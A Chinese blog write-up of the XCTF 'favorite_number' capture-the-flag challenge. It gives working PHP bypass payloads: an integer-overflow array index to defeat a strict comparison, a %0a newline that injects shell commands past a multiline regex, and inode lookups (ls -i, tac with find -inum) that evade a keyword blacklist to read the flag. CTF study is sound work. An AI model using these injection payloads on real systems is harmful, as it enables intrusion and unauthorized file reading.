XCTF-favorite_number

题目 (xctf.org.cn)

  • 判断,既要数组强等于,又要首元素不等;php有下标越界溢出漏洞,因此0可以通过整型溢出得到 绕过if判断
    playload:stuff[4294967296]=admin&stuff[1]=user&num=123456
  • 然后是个正则,要求整个字符串都是数字,大小写不敏感,跨行检测
    playload:stuff[4294967296]=admin&stuff[1]=user&num=123%0als
  • 最后是个黑名单,排除了cat、flag等词

inode索引结点

因为黑名单的存在,查找flag索引节点来找到flag,
payload:

stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i / 显示所有文件加索引。

显示flag
payload:

stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum 1573238` 2的32次方为4294967296

posted @   JICEY  阅读(123)  评论(0编辑  收藏  举报
编辑推荐:
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】

阅读目录(Content)

此页目录为空

点击右上角即可分享
微信分享提示